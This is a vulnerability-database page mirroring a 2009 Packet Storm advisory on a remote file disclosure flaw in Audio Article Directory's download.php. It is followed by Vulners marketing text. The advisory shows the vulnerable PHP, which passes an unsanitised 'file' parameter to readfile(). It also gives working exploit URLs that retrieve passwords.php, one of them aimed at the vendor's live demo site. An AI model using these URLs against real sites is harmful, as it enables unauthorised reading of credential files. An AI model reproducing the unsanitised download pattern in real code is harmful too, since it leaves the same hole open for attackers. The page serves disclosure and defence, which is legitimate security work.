Lucene search
K

Audio Article Directory File Disclosure

🗓️ 29 Jun 2009 00:00:00Reported by ThE g0bL!NType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

Audio Article Directory File Disclosure Vulnerability, Discovered By ThE g0bL!N, Allows Unauthorized File Downloa

Code
`#################################################################################################################  
[+] Audio Article Directory Remote File Disclosure Vulnerability  
[+] Discovered By ThE g0bL!N  
Vendor:http://audioarticledirectory.com  
#################################################################################################################  
Poc  
---  
Download.php  
<?  
$file = "./".$_GET['file']; => one  
header('Content-Description: File Transfer');  
header('Content-Type: application/force-download');  
header("Content-Disposition: attachment; filename=\"".basename($file)."\";");  
header('Content-Length: ' . filesize($file));  
@readfile($file) OR die(); => 2  
?>  
Exploit  
----  
http://victim/download.php?file=download.php  
http://victim/download.php?file=./passwords.php  
Demo  
----  
http://audioarticledirectory.com/demo/download.php?file=./passwords.php  
################################################################################################################  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation